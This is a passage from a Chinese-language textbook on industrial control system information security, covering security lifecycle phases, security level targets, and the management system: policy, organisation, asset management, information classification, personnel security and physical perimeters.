详细分析。 1. 初步设计阶段 初步设计阶段通常由两个步骤组成,分别是识别和概念。 1 ) 识 别 在识别步骤中主要完成以下工作: (1)充分认识财产设备、资产、服务、人员等保护的需求。 (2)开始开发信息安全程序。 2)概念 在概念步骤中主要完成以下工作: (1)继续开发信息安全程序。 (2)做好资产、服务、人员等保护等级需求文档。 (3)做好公司内部和外部威胁文档。 ( 4 ) 建 立 信 息 安 全 使 命 、 前 景 和 价 值 观 。 (5)为工业控制系统与设备、信息系统和人员开发信息安全方针。 2. 功能分析阶段 功能分析阶段通常由一个步骤组成,即定义。 在定义步骤中主要完成以下工作: (1)继续开发信息安全程序。 (2)为工业控制系统与设备、信息系统和人员建立信息安全功能要求。 (3)基于潜在威胁清单,做好相关设施与服务的漏洞评估。 (4)找出和确定工业控制系统的法律法规要求。 (5)对潜在漏洞和威胁进行风险评估。 (6)对风险、潜在的公司冲击和潜在的减轻措施进行分类。 (7)将信息安全工作分隔成可控制的任务和模块,为功能设计开发做好准备。 (8)为工业控制系统信息安全部分建立网络功能定义。 3. 实施阶段 实施阶段通常由3个步骤组成,分别是功能设计、详细设计和施工。 1)功能设计 在功能设计步骤中主要完成以下工作: (1)信息安全程序开发。 (2)为公司区域、工厂区域和控制区域制定信息安全功能要求。 (3)定义信息安全功能的组织机构和架构。 (4)定义实施计划要求的功能。 (5)定义和公布信息安全区域、边界和访问控制端口。 (6)完成和发布信息安全方针和程序。 2)详细设计 在详细设计步骤中主要完成以下工作: (1)为实现前面定义的信息安全功能要求设计物理和逻辑控制系统。 (2)开展培训。 (3)实施计划完整开发。 (4)起草资产管理程序和变更管理程序。 (5)为保护区域设计边界和访问控制端口。 3)施工 在施工步骤中主要完成以下工作: (1)执行实施计划。为完成公司内安全区域和边界安装物理信息安全设备、逻辑运 用、软件配置和人员安排程序。 (2)激活和维护访问控制端口属性。 (3)完成培训。 (4)正式启动和运作资产管理程序和变更管理程序。 (5)完成信息安全系统交付包,准备交给运行和维护人员验收。 4. 运行阶段 运行阶段通常由两个步骤组成,分别是运行和符合性监视。 1)运行 在运行步骤中主要完成以下工作: (1)运行和维护人员完成和接收这些安全设备、服务、运用和软件配置。 (2)为相关人员开展培训,并提供与信息安全相关的继续培训。 (3)维护人员监视公司、工厂或控制区域的安全部分,并维持这部分的功能正常运行。 (4)资产管理程序和变更管理程序获得正常运作和维护。 2)符合性监视 在符合性监视步骤中主要完成以下工作: (1)内部审计。 (2)风险检查。 (3)外部审计。 5. 循环与处置阶段 循环与处置阶段通常由两个步骤组成,分别是处置和解除。 1)处置 在处置步骤中主要完成以下工作: (1)正确拆除和处置过期的信息安全系统。 (2)为区域保护更新或重新创立信息安全边界。 (3)创立、重新定义、重新配置或关闭访问控制端口。 (4)向相关人员说明对信息安全系统所做的改动和对相应系统产生的影响。 2)解除 在解除步骤中主要完成以下工作: (1)正确收集、文档化及安全存档或销毁知识产权。 (2)关闭访问控制端口和相应的链接。 (3)向相关人员说明信息安全系统的解除和对保留系统的影响。 5.4 工业控制系统信息安全等级生命周期 定义控制系统的区域边界和管道后,信息安全等级成为控制系统区域信息安全生命周 期的一个重要部分。信息安全等级生命周期长时间关注区域或管道的信息安全等级,不可 以与该控制系统区域实际物理资产的生命周期混淆。尽管资产的生命周期和区域信息安全 生命周期有许多重叠和补充活动,但是两者各自有不同的触发点,促使从一个阶段走向另 一个阶段。同时,物理资产的改动可引发一整套信息安全等级的活动,或者信息安全漏洞 的某个变化也可导致物理资产的变化。 工业控制系统信息安全等级生命周期如 图5-4所示。在安全生命周期的评估阶段给 区域分配 SL(目标);在开发与实施阶段执 行对抗措施以满足区域要求的 SL (目标)。 一个区域的 SL (达到的)依赖于多种因素。 为了确保区域的 SL (达到的)始终优于或等 于 SL (目标),必要时,在安全生命周期的 维护阶段应审计和/或测试并升级对抗措施。 图5-4 工业控制系统信息安全等级生命周期图 5.4.1 评估阶段 ① 业空制系统信息安全 5.4.2 开发与实施阶段 一旦在评估阶段给区域分配了信息安全目标等级,就应执行对抗措施以验证区域的安 全目标大于或等于设定的安全目标。图5-6描述了在信息安全等级生命周期的开发与实施 阶段有关新建或现有控制系统区域的所有活动。根据区域的安全要求确认系统后,其对应 的安全目标等级就已确定。 图5-6 工业控制系统信息安全等级生命周期模型(开发与实施阶段) 5.4.3 维护阶段 设备和系统的对抗措施与安全目标的达成度会随时间而降低等级。区域的安全目标应定 期或当发现新脆弱性时进行审计和/或测试,以确保区域的安全目标的达成度始终大于或等 于所设定的安全目标。与维护区域的安全目标达成度的评估测试相关的活动如图5-7所示。 图5 - 7 工业控制系统信息安全等级生命周期模型(维护阶段) 第6章 工业控制系统信息安全管理体系 6.1 概 述 工业控制系统信息安全不仅需要正确的技术解决方案,而且需要完善的管理方案。因 此,建立一套全面而有效的工业控制系统信息安全管理体系势在必行。 每个工业控制系统的组织机构都需要建立相应的工业控制系统信息安全管理体系 (ICS Security Management System,ICS-SMS) (有时又称工业控制系统信息安全管理程序 或工业控制系统信息安全管理系统),其目的在于指导组织机构在已有安全管理体系的框 架或环境下,建立、实施、运行、监视、评审、保持与改进控制系统的信息安全,从而达 到组织机构对控制系统信息安全的要求。 目前,国际上普遍采用“规划 (Plan)— 实施(Do)— 检查 (Check) 一处置 (Act)” (PDCA) 模型来建立工业控制系统信息安全管理体系过程,其模型如图6-1所示。 图6-1 应用于工业控制系统信息安全管理体系过程的 PDCA 模型 建立工业控制系统信息安全管理体系,就是建立工业控制系统信息安全管理体系的方 针、目标、过程和规程,管理风险和提高信息安全,从而获得与组织机构总方针和总目标 相一致的结果。 实施和运行工业控制系统信息安全管理体系,就是实施和运行工业控制系统信息安全 管理体系的方针、控制措施、过程和规程。 监视与评审工业控制系统信息安全管理体系,就是对照工业控制系统信息安全管理体系 的方针、目标和实践经验,评估并测量过程的执行情况,并将结果报告管理层以供评审。 保持与改进工业控制系统信息安全管理体系,就是基于工业控制系统信息安全管理体 系内部评审结果与其他相关信息,采取预防和纠正措施,持续改进工业控制系统信息安全 管理体系。 工业控制系统信息安全管理体系通常包括的内容有安全方针、组织与合作团队、资 第6章 工业控制系统信息安全管理体系 产管理、人力资源安全、物理与环境管理、通信与操作管理、访问控制、信息获取与开发 维护、信息安全事件管理、业务连续性管理及符合性。工业控制系统的组织机构可以根据 自身实际情况,合理选择这些内容,建立一套全面而有效的工业控制系统信息安全管理 体系。 下面将这些管理体系的内容进行介绍。 6.2 安 全 方 针 安全方针是工业控制系统信息安全管理的重要指导方针。 每个工业控制系统的资产拥有者或组织机构都需要建立相应的安全方针。 信息安全方针的目标是依据业务要求、相关法律法规和健康、安全、环境 (HSE) 需 求提供管理指导并支持工业控制系统信息安全。 管理层应根据这个目标制定清晰的方针指导,在整个组织机构中颁布和维护信息安全 方针,表明对信息安全的支持和承诺。 1. 信息安全方针文件 信息安全方针文件应由管理层批准、发布和传达给所有员工和外部相关方。 信息安全方针文件应说明管理承诺,并提出组织机构管理信息安全的方法。信息安全 方针文件包括以下两项声明: (1)信息安全、总体目标、范围,以及信息安全重要性的定义,以保障工业控制系统 信息安全管理体系。 (2)管理层意图的声明,以支持符合业务策略和目标的信息安全目标、原则和健康、 安全、环境 (HSE) 需求。 组织机构应建立控制目标和控制措施的框架,包括风险评估和风险管理的结构。 组织机构特别重要的安全方针策略、原则、标准和符合性要求的简要说明,应包括符 合法律法规和合同要求,安全教育、培训和意识要求,业务连续性管理,以及违反信息安 全方针的后果。 组织机构应有信息安全管理的一般职责和特定职责的定义,包括报告信息安全事件。 组织机构应做好支持方针文件的引用,如特定信息系统的更详细的安全策略和规程, 或者用户要遵守的安全规则。 信息安全方针应对相关人员开放且被理解,并在整个组织机构和使用者中进行沟通。 2. 信息安全方针评审 信息安全方针应按计划的时间或在发生重大变化时进行评审,确保其持续的适合性、 充分性和有效性。这些评审应包括运作和变更管理方针。 信息安全方针应有专人负责。该负责人负有信息安全方针制定、评审和评价的管理职责。评审要包括评估组织机构信息安全方针改进的机会和管理信息安全适应组织机构环 境、业务状况、法律条件或技术环境变化的方法。 信息安全方针评审应考虑管理评审的结果。定义管理评审规程包括时间表或评审周 期。管理评审的输入信息包括相关方的反馈、独立评审的结果、预防和纠正措施的状态、 以往管理评审的结果、过程执行情况和信息安全方针符合性、可能影响组织机构管理信息 安全的方法的变更(主要包括组织机构环境、业务状况、资源可用性、合同、规章和法律 条件或技术环境的变更等)、威胁和脆弱性的趋势、已报告的信息安全事件、相关政府部 门的建议。管理评审的输出信息包括与组织机构管理信息安全的方法及其过程的改进有关 的决定和措施,应包括与控制目标和控制措施的改进有关的决定和措施、与资源和/或职 责分配的改进有关的决定和措施、与维护管理评审的记录并获得管理层对修订方针的批准 有关的决定和措施。 6.3 组织与合作团队 工业控制系统信息安全组织通常是由内部组织和外部组织组成的合作团队。 6.3.1 内部组织 内部组织的目标是管理组织机构范围内工业控制系统信息安全。 内部组织应建立管理框架,以启动和控制组织机构范围内工业控制系统信息安全的实 施。 管理层应批准工业控制系统信息安全方针、分配安全角色,以及协调和评审整个组织 机构安全的实施。 在必要时,应在组织机构范围内建立专家工业控制系统信息安全建议库,并在组织机 构内应用。另外,发展与外部安全专家或组织机构的联系,以便跟上行业趋势、跟踪标准 和评估方法,并且在处理信息安全事件时,能提供合适的联络点。同时,鼓励多个专业共 同参与,以应对工业控制系统信息安全。 1. 信息安全的管理承诺 管理层要通过清晰的说明、可证实的承诺、明确的信息安全职责分配及确认,积极支 持组织机构内工业控制系统信息安全。 管理层应确保信息安全目标获得识别,满足组织机构要求,并已被整合到相关过程 中。同时,管理层应制定、评审、批准信息安全方针。 信息安全的管理承诺应评审信息安全方针实施的有效性,为安全启动提供明确的方向 和支持,为信息安全提供所需资源,批准整个组织机构内信息安全专门的角色和职责分 配,启动计划和程序来保持信息安全意识,确保整个组织机构内信息安全控制措施的实施 是相互协调的。 管理层应识别内、外部专家信息安全建议的需求,并且在整个组织机构内评审和协调 专家建议结果。 依据组织机构规模的不同,这些职责可以由一个专门的管理协调小组或由一个已有的 机构(如董事会)来承担。 2. 信息安全协调 信息安全活动通常由来自组织机构不同部门并具备相关角色和工作职责的代表进行 协调。 工业控制系统信息安全协调通常包括工业控制系统专家、管理人员、用户、行政人 员、应用设计人员、审核员和安全人员,以及保险、法律、人力资源、IT、 风险管理、运 行、工艺安全、物理安全等领域专家的协调和协作。 信息安全协调活动应做到的内容:确保安全活动的实施与信息安全方针相一致;确定 如何处理不符合项;核准信息安全的方法和过程,如风险评估、信息分类;识别重大的威 胁变更和暴露在威胁下的控制系统;评估信息安全控制措施实施的充分性和协调性;评价 在信息安全事件的监视和评审中获得的信息,推荐适当的措施响应识别的信息安全事件; 有效促进整个组织机构内的信息安全教育、培训和意识。 3. 信息安全职责的分配 信息安全职责的分配就是应清晰地定义所有信息安全职责。 信息安全职责的分配应与信息安全方针相一致,每项资产的保护和执行特定安全过程 的职责都要清晰识别。在必要时补充这些职责,为特定地点和控制系统提供更详细的指 南。此外,应清晰定义资产保护和执行特定安全过程的局部职责。 分配有安全职责的人员可以将安全任务委托给其他人员,但不能因此免除其责任,以 保证任何被委托的任务被正确执行。 对个人负责的领域应清晰地规定,尤其是与每个特殊系统相关的资产和安全过程要予 以识别并清晰地定义。要分配每项资产或安全过程的实体职责,并且该职责的细节要形成 文件。此外,授权级别要清晰地予以定义,并形成文件。 组织机构应任命 一 名信息安全管理人员全面负责信息安全的开发和实施,并支持控 制措施识别,但是在许多组织机构中,提供控制措施资源并实施这些控制措施的职责通 常归于各个管理人员。因此,常见的做法是为每项资产都指定 一名责任人负责该项资产 的日常保护。 4. 控制系统的授权过程 控制系统的定义和实施应有一个管理授权过程。 控制系统的授权过程应考虑以下几点。 (1)控制系统要有适当的用户管理授权,以批准其用途和使用;还要获得负责维护本 地系统安全环境的管理人员的授权,以确保所有相关的安全方针策略和要求得到满足。 (2)若有必要,硬件和软件需进行核查,以确保其与其他系统组件兼容。 个人或私有信息处理设施,如便携式计算机、家用计算机、手持设备等,使用在控制 系统环境中,可能引入新的脆弱性,因此,应识别和实施必要的控制措施。 5. 保密性协议 组织机构信息保护保密性协议的要求应识别并定期评审。 保密性协议需要使用合法的可实施条款来解决保护保密信息的要求。同时,保密性协 议应遵循相关法律法规。 保密性协议的签署者应知道他/她们的职责,通过授权或负责的方式保护、使用和公 开信息。 6. 与相关部门的联系 组织机构应保持与相关部门的适当联系。 组织机构的规程中要指明什么时候与哪个部门(如执法部门、消防部门、监管部门 等)联系,以及当怀疑已识别的信息安全事件可能触犯了法律时,如何及时报告。 保持这样的联系可能是支持信息安全事件管理或业务连续性和应急规划过程的要求。 与法规部门的联系有助于预先知道组织机构必须遵循的法律法规方面预期的变化,并为这 些变化做好准备。与其他相关部门的联系包括公共设施、紧急服务和安监部门等。 当受到来自互联网攻击的组织机构需要外部第三方时,组织机构需要互联网服务提供 商或电信部门等外部第三方采取应对攻击源的措施。 7. 与相关组织的联系 组织机构可以与一些特别兴趣组织、专业安全技术论坛或专业协会保持一定的联系。 通过与这些相关组织的联系,可以共享控制系统信息安全信息和实践,提高控制系统 信息安全知识水平,掌握控制系统信息安全环境现状,积极应对和处理控制系统信息安全 的信息事件。 8. 信息安全的独立评审 组织机构应按计划的时间间隔对管理信息安全的方法及其实施(如信息安全的控制目 标、控制措施、策略、过程和规程)进行独立评审。当安全实施发生重大变化时,也要进 行独立评审。 独立评审应由管理层启动。对于确保 一个组织机构管理信息安全方法的持续的适宜 性、充分性和有效性,这种独立评审是必要的。独立评审要包括评估安全方法改进的机会 和变更的需要、信息安全方针和控制目标。 独立评审通常由独立于被评审范围的人员执行。独立评审的人员可以来自组织机构内 部审核部门、独立的管理人员或第三方专业机构。 第6章工业控制系统信息安全管理体系 6.3.2 外部组织 外部组织的目标是保持组织机构被外部组织访问、处理、管理或与外部进行通信的信 息和控制系统的安全。 组织机构的控制系统信息安全不应由于引入外部组织的产品或服务而降低。外部组织 对组织机构控制系统的任何访问、对信息资产的处理和通信都应进行控制。 如果组织机构有需要与外部组织一起工作的业务,则可能要求访问组织机构的控制 系统从外部组织获得产品和服务,或提供给外部组织产品和服务,应进行风险评估以确 定涉及信息安全的方面和控制要求。在与外部组织签定的协议中,双方宜商定和定义控 制措施。 1. 与外部组织相关风险的识别 涉及外部组织业务过程中工业控制系统的风险应予以识别,并在允许访问前实施适当 的控制措施。 当需要允许外部组织访问组织机构的控制系统或信息时,应实施风险评估以识别特定 控制措施的要求。关于外部组织访问的风险识别应考虑以下两点: (1)外部组织需要访问的控制系统。 (2)外部组织对控制系统的访问类型,如物理访问(如进入中控室、控制现场、电子 设备间、档案室等)、逻辑访问(如访问控制系统、组态信息、数据库等)、组织机构和外 部组织之间的网络连接(如固定连接、远程访问等),以及现场访问或非现场访问。 外部组织应意识到他们的义务,并在访问、处理、通信或管理组织机构控制系统时履 行相应的职责和责任。 2. 处理与顾客有关的安全问题 在允许顾客访问组织机构控制系统之前,必须处理所有确定的安全要求。 在允许顾客访问组织机构的控制系统资产前应解决相关安全问题,应充分考虑资产保 护,包括保护组织机构信息和软件资产的规程,对已知脆弱性的管理,判定资产是否受到 损坏(如丢失数据或修改数据)的规程、完整性和对复制、公开信息的限制;应充分考虑 需提供的产品或服务的描述;应充分考虑顾客访问的不同原因、要求和利益;应充分考虑 访问控制策略,包括允许的访问方法、唯一标识符(如用户ID 和口令)的控制和使用、 用户访问和权限的授权过程、没有明确授权的访问均被禁止的声明,以及撤销访问权或 中断系统间连接的处理;应充分考虑对信息错误(如个人信息的错误)、信息安全事件 和安全违规进行报告、通知和调查的安排;应充分考虑每项可用服务的描述;应充分考 虑服务的目标级别和服务的不可接受级别;应充分考虑监视和撤销与组织机构资产有关 的任何活动的权利;应充分考虑组织机构和顾客各自的义务;应充分考虑相关法律问题 和如何确保满足法律要求(如数据保护法律)。如果协议涉及与其他国家顾客的合作, 特别要考虑不同国家的法律体系,还应充分考虑知识产权、版权转让,以及任何合著作品的保护。 按照所访问控制系统和信息的不同,与顾客访问组织机构资产有关的安全要求有明显 差异。在顾客协议中明确这些安全要求时,应包括所有已确定的风险和安全要求。 如果与外部组织的协议有可能涉及多方,那么允许外部组织访问的协议要包括允许指 派其他合作方,并规定他们访问和介入的条件。 3. 处理第三方协议中的安全问题 当涉及访问、处理或管理组织机构的控制系统,以及与之通信的第三方协议,或在控 制系统中增加产品或服务的第三方协议时,应涵盖所有相关的安全要求。 第三方协议要确保在组织机构和第三方之间不存在误解。第三方的保障应满足组织机 构自己的需要。 6.3.3 合作团队 合作团队的目标是共同做好工业控制系统信息安全工作。 工业控制系统信息安全合作团队由内部组织和外部组织组成。内部组织包括组织机构 自动化专业组、IT 专业组、HSE 专业组和生产运营组;外部组织包括工业控制系统产品 供应商和系统集成商。 这种跨专业的信息安全团队能够共享各专业组的知识和经验,评估和降低工业控制系 统的风险。 信息安全团队应直接向管理层汇报。 组织机构自动化专业组在信息安全团队中扮演重要角色,协调组织机构的 IT 专业 组 、HSE 专业组和生产运营组,以及产品供应商和系统集成商,共同做好工业控制系统 信息安全工作。 6.4 资 产 管 理 工业控制系统信息安全资产管理需要考虑资产负责和信息分类。 6.4.1 资产负责 资产负责的目标是实现和保持对组织机构资产的适当保护。 每一项资产是可核查的。对每一项资产应指定责任人,并且赋予保持相应控制措施的 职责。特定控制措施的实施可以由责任人适当地委派别人承担,但责任人仍有对资产提供 适当保护的责任。 第6章 工业控制系统信息安全管理体系 1. 资产清单 所有资产应清晰地识别,所有重要资产的清单应编制并维护。 组织机构应识别所有资产,并将资产的重要性形成文件。资产清单要包括所有从灾难 中恢复且必要的信息,包括资产类型、格式、位置、备份信息、许可证信息和业务价值。 该清单不要复制其他不必要的清单,但要确保内容是相关联的。 此外,每一项资产的责任人和信息分类应商定,并形成文件。根据资产的重要性、业 务价值和安全级别,应识别与资产重要性对应的保护级别。 2. 资产责任人 与控制系统有关的所有资产应由组织机构的指定部门或人员承担责任。 资产责任人应确保与控制系统相关的信息和资产进行适当分类,定期评审访问限制和 分类,并考虑可应用的访问控制策略。 日常任务可以委派给其他人,如委派给一个管理人员每天监管资产,但责任人仍保留 职责。 在复杂的控制系统中,将一组资产指派给一个责任人或许是比较有用且可行的,他们 一起工作来提供特殊的“服务”功能。在这种情况下,服务责任人负责提供服务,包括资 产本身提供的功能。 3. 资产的可接受使用 与控制系统有关的资产可接受使用规则应确定,形成文件并加以实施。 所有雇员、承包方人员和第三方人员要遵循控制系统相关资产的可接受的使用规则, 包括电子邮件使用规则、互联网使用规则和移动设备使用规则。 管理层应提供具体规则或指南。使用或拥有访问组织机构资产权的雇员、承包方人员 和第三方人员要意识到他们使用控制系统相关的资产及资源时的限制条件。他们要对其使 用控制系统,以及在职责范围内的使用负责。 6.4.2 信息分类 信息分类的目标是确保信息受到适当级别的保护。信息分类,可以在处理信息时指明 保护的需求、优先级和期望的安全程度。 信息具有各种不同程度的敏感性和关键性,有些项可能要求附加等级的保护或特殊处 理。信息分类机制用来定义一组合适的保护等级并传达处理措施的需求。 1. 分类指南 信息分类,应按照其对组织机构的价值、法律要求、敏感性和关键性进行。对信息进 行分类,是确定该信息如何处理和保护的简便方法。 信息分类及相关保护控制措施,应考虑共享或限制信息的业务需求及与这种需求相关 ①业空制系统信息安 全 (第己版) 的业务影响。 信息分类指南应包括根据预先确定的访问控制策略进行初始分类及一段时间后进行重 新分类的惯例,而前面提到的资产责任人的职责是确定资产类别、对其周期性评审,以及 确保其最新并处于适当级别。同时,应充分考虑信息分类类别的数目和从其使用中获得的 好处。过度复杂的方案可能对使用来说不方便,也不经济,或许是不切实际的。在解释从 其他组织机构获取的文件分类标记时要小心,因为其他组织机构可能对于相同或类似命名 的标记有不同定义。 信息保护级别可通过分析被考虑信息的完整性、可用性、保密性3个基本要求及其他 要求进行评估。经过一段时间后,信息通常不再是敏感的或关键的,如该信息已经公开 等,这些方面要加以考虑,因为过多的分类致使实施不必要的控制措施,从而导致附加成 本。此外,当分配信息分类级别时,考虑具有类似安全要求的文件可简化分类的任务。 2. 信息的标记和处理 按照组织机构所采纳的信息分类机制,建立和实施一组合适的信息标记和处理规程。 信息标记的规程要涵盖物理和电子格式的信息资产。 对含有分类为敏感或关键信息的系统输出,要在该输出中携带合适的分类标记。这种 分类标记要根据分类指南中所建立的规则反映出分类。需要考虑的项目包括打印报告、屏 幕显示、记录介质(如磁带、磁盘、CD)、 电子消息和文件传送。 针对每种信息分类级别,信息的处理规程应定义。信息的处理规程包括安全处理、储 存、传输、删除和销毁,还包括一系列任何安全相关事态的监督和记录规程。 分类信息的标记和安全处理是信息共享的一个关键要求。常用的标记形式是物理标记, 而有些信息资产(如电子形式的文件等)不能做物理标记,则需要使用电子标记手段。在标 记不适用时,可能需要应用指定信息分类指定的其他方式,如通过规程或元数据。 6.5 人力资源安全 工业控制系统信息安全人力资源安全需要考虑任用前、任用中和任用终止或变更。 6.5.1 任用前 任用前的目标是确保雇员、承包方人员和第三方人员理解其职责、考虑对其承担的角 色是适合的,以降低设施被窃、欺诈和误用的风险。 任用前,雇员、承包方人员和第三方人员信息安全职责在相应的岗位描述、任用条款 和条件中明确指出。 所有要任用、承包方人员和第三方人员的候选者要充分审查,特别是对敏感岗位的成 员。 第6章 工业控制系统信息安全管理体系 使用控制系统的雇员、承包方人员和第三方人员要签署关于他们同意且理解各自信息 安全角色和职责的声明。 1. 角色和职责 根据组织机构的信息安全方针和人事安全方针,雇员、承包方人员和第三方人员的信 息安全角色和职责应被定义,并形成文件。 信息安全角色和职责应按照组织机构的信息安全方针实施和运行,执行特定的安全过 程或活动,保护资产免受未授权访问、泄露、修改、销毁或干扰,确保职责分配给可采取 措施的个人,向组织机构报告安全事态或潜在事态,或其他安全风险。 在任用前对信息安全角色和职责清晰定义并传达给岗位候选者。 信息安全角色和职责可以用岗位描述来形成文件。对没有在组织机构任用过程(如通 过第三方组织机构任用)中任用的个人的信息安全角色和职责也应清晰地定义并传达。 2. 审查 所有任用访问控制系统的候选者、承包方人员和第三方人员的背景验证和身份有效性 确认应按照相关法律法规、道德规范和对应的业务要求、被访问信息的类别和察觉的风险 来执行。 验证核查要考虑所有相关隐私、个人数据保护和/或与任用相关的法律,并在允许时 包括:申请人履历的核查(针对完备性和准确性),令人满意的个人资料的可用性(如一 项业务和一个人),所获得的学术、专业资质的证实,个人身份核查(如护照或类似文 件),更多细节核查(如信用卡核查、犯罪记录核查等)。 当一个初始任命的或提升的职务涉及对控制系统进行访问的人时,特别是这些设施正 在处理敏感信息,如财务信息、高度保密信息,或控制系统在处理高风险工艺时,那么该 组织机构对这些人员还要考虑进一步、更详细的核查。 组织机构应有规程,确定验证核查的准则和限制,如谁有资格审查人员,以及如何、 何时、为什么执行验证核查。对于承包方人员和第三方人员也要执行审查过程。若承包方 人员是通过代理提供的,那么与代理的合同应清晰地规定代理对审查的职责,以及如果未 完成审查或结果引起怀疑或关注时,这些代理需要遵守的通知规程。同样,与第三方的协 议清晰地指定审查的所有职责和通知规程。 对考虑在组织机构内录用的所有候选者的信息要按照相关管辖范围内存在的合适法律 来收集和处理。依据适用的法律,要将审查活动提前通知候选者。 3. 任用条款和条件 作为合同义务的一部分,雇员、承办方人员和第三方人员应同意并签署他们的任用合 同条款,这些条款和条件声明是他们在组织机构中控制系统信息安全的职责。 6.5.2 任 用 中 任用中的目标是确保所有雇员、承包方人员和第三方人员知悉信息安全威胁和利害关 系、他们的职责和义务,并准备好在其正常工作过程中支持组织机构的安全方针,以减小 人为出错的风险。 通过确定管理职责,确保安全措施应用于组织机构内个人的整个任用期。 为尽可能减小安全风险,对所有雇员、承包方人员和第三方人员应提供信息安全规程 的适当程度的意识、教育和培训,以及控制系统设施的正确使用,还要建立一个正式的处 理信息安全违规的纪律处理过程。 1. 管理职责 管理层必须要求雇员、承包方人员和第三方人员按照组织机构已建立的方针策略和规 程对信息安全尽心尽力。 管理职责应确保雇员、承包方人员和第三方人员在被授权访问敏感信息或控制系统前 了解其信息安全角色和职责,获得声明他们在组织机构中角色的安全期望的指南,被激励 以实现组织机构的安全策略,对于他们在组织机构内角色和职责的相关安全问题的意识程 度达到一定级别,遵守任用的条款和条件(包括组织机构的信息安全方针和工作的合适方 法),以及持续拥有适当的技能和资质。 若雇员、承包方人员或第三方人员没有意识到他们的信息安全职责,则可能会对组织 机构造成相当大的破坏。被激励人员更可靠并能减少信息安全事件的发生。 缺乏有效管理会使员工感觉被低估,并由此导致对组织机构的负面安全影响。 2. 信息安全意识、教育和培训 组织机构、承包方和第三方人员应受到与其工作职能相关的适当的意识培训和对组织 机构方针策略及规程的定期更新培训。 意识培训从一个正式的介绍过程开始,这个过程用来在允许访问信息或控制系统前介 绍组织机构的信息安全方针策略和期望。持续培训应包括信息安全要求、法定职责和业务 控制,以及控制系统设施的正确使用培训。这些培训应定期检查和更新,以适应控制系统 的变更和面临变化的威胁。 信息安全意识、教育和培训活动要与员工的角色、职责和技能相匹配和关联。 3. 纪律处理过程 对信息安全违规的雇员、承包方人员和第三方人员应有一个正式的纪律处理过程。 在纪律处理过程之前,应有一个信息安全违规验证过程。 正式的纪律处理过程应确保正确和公平地对待被怀疑信息安全违规的雇员、承包方人员 和第三方人员。无论违规是第一次发生还是已重复发生过,以及无论违规者是否经过适当培 训,正式的纪律处理过程规定了一个分级响应。要考虑其违规的性质、重要性及对于业务的影响等因素,同时需要考虑相关法律、业务合同和其他因素。对于严重的明知故犯的情况, 要给违规者立即免职、删除其访问权和特殊权限,如果必要,直接护送其离开现场。 纪律处理过程也可用于对雇员、承包方人员和第三方人员的一种威慑,防止他们违反 组织机构的信息安全策略和规程及其他信息安全违规。 6.5.3 任用终止或变更 任用终止或变更的目标是确保雇员、承包方人员和第三方人员以一个规范的方式退出 一个组织机构或改变其任用关系。 应有合适的职责确保管理雇员、承包方人员和第三方人员从组织机构退出,并确保他 们归还所有设备和受控物品,以及删除他们所有访问权。 组织机构内职责和任用的变更管理应符合本节内容,与职责或任用的终止管理相似, 任何新的任用应遵循前面提到的任用之前的内容进行管理。 1. 终止职责 应清晰地定义和分配任用终止或任用变更的职责。 终止职责的传达要包括正在进行的信息安全要求和法律职责,适当时,还包括任何保 密协议规定的职责,并且在雇员、承包方人员和第三方人员的雇佣关系结束持续一段时间 后仍然有效的任用条款和条件。 在雇员、承包方人员或第三方人员的合同中应包含规定职责和义务在任用终止后仍然 有效的内容。 职责或任用的变更管理应与职责或任用的终止管理相似,新的任用责任应遵循任用之 前的内容。 人力资源的职能通常是与管理相关规程的安全方面的监督管理员一起负责总体的任用 终止处理。对于承包方人员的情况,终止职责的处理可能由代表承包方人员的代理完成, 其他情况下的用户可能由他们的组织机构来处理。人力资源部门应通知雇员、顾客、承包 方人员或第三方人员关于组织机构人员的变更和运营上的安排。 2. 资产的归还 在终止任用、合同或协议时,所有雇员、承包方人员和第三方人员应归还他们使用的 所有组织机构资产。 终止过程应正式化,包括归还所有先前发放的软件、公司文件和设备,以及其他组 织机构资产,如移动计算设备、信用卡、访问卡、软件、手册和存储于电子介质中的信 息等。 雇员、承包方人员或第三方人员购买了组织机构的设备或使用他们自己的设备时,应 遵循规程确保所有相关的信息已转移给组织机构,并且已从设备中安全删除。 如果一个雇员、承包方人员或第三方人员拥有的知识对正在进行的操作具有重要意 义,那么此信息要形成文件并传达给组织机构。 3. 撤销访问权 在任用、合同或协议终止、变化时,所有雇员、承包方人员和第三方人员对信息和控 制系统设施的访问权应进行相应删除或调整。 在任用终止时,个人对与信息系统和服务有关的资产的访问权应重新考虑。这将决定 删除访问权是否是必要的。任用的变更要体现在不适用于新岗位的访问权的删除上。删除 或改变的访问权包括物理和逻辑访问、密钥、ID 卡、控制系统和签名,并要从标识其作 为组织机构的现有成员的文件中删除。如果一个已离开的雇员、承包方人员或第三方人员 知道仍保持活动状态的账户密码,则应在任用、合同或协议终止、变更后改变口令。 有些情况下,访问权的分配基于对多人可用而不是只基于离开的雇员、承包方人员或 第三方人员,如组 ID 。在这种情况下,从组访问列表中删除离开的人员,还要建议所有 相关的其他雇员、承包方人员和第三方人员不要再与已离开的人员共享信息。 在管理层发起终止的情况下,不满的雇员、承包方人员或第三方人员可能故意破 坏信息或控制系统设施。在员工辞职的情况下,他们可能为将来的使用而收集必要的 信息。 6.6 物理与环境管理 工业控制系统信息安全物理与环境管理需要考虑安全区域和设备安全。 6.6.1 安全区域 安全区域的目标是防止对组织机构场所和控制系统的未授权物理访问、损坏和干扰。 关键或敏感的控制系统应放置在安全区域内,并受到确定的安全周界的保护,并具备 适当的安全屏障和入口控制。这些控制系统要在物理上避免未授权访问、损坏和干扰。 所提供的保护要与所识别的风险相匹配。 1. 物理安全周界 保护包含工业控制系统设施的区域,必须使用安全周界,如墙、卡控制的入口或有人 管理的接待台等屏障。 物理安全周界应考虑和实施下列两点: (1)安全周界清晰地予以定义,各个周边的设置地点和强度取决于周边内资产的安全 要求和风险评估的结果。 (2)包含信息处理设施的建筑物或场地的周边要在物理上是安全的,即在周边或区域 内不要存在可能易于闯入的任何缺口,场所的外墙是坚固结构,所有外部的门要使用控制 机制来适当保护,以防止未授权进入,如身份识别仪器、门禁系统、报警器、门锁等。 对场所或建筑物的物理访问手段应到位(如有人管理的接待区域或其他控制),进入 场所或建筑物应仅限于已授权人员。如果可行,应建立物理屏障以防止未经授权的进入。 第6章 工业控制系统信息安全管理体系 安全周界的所有防护门要可发出报警信号、被监视并经过测试,与墙一起按照我国相 关标准建立所需的防护级别,他们要使用故障保护方式按照当地防护规范来运行。 安全周界要按照我国标准安装适当的入侵检测系统,并定期测试以覆盖所有的外部门 窗,要一直警惕空闲区域,其他区域要提供掩护方法。 组织机构管理的控制系统设施要在物理上与第三方管理的设施分开。其他信息物理保 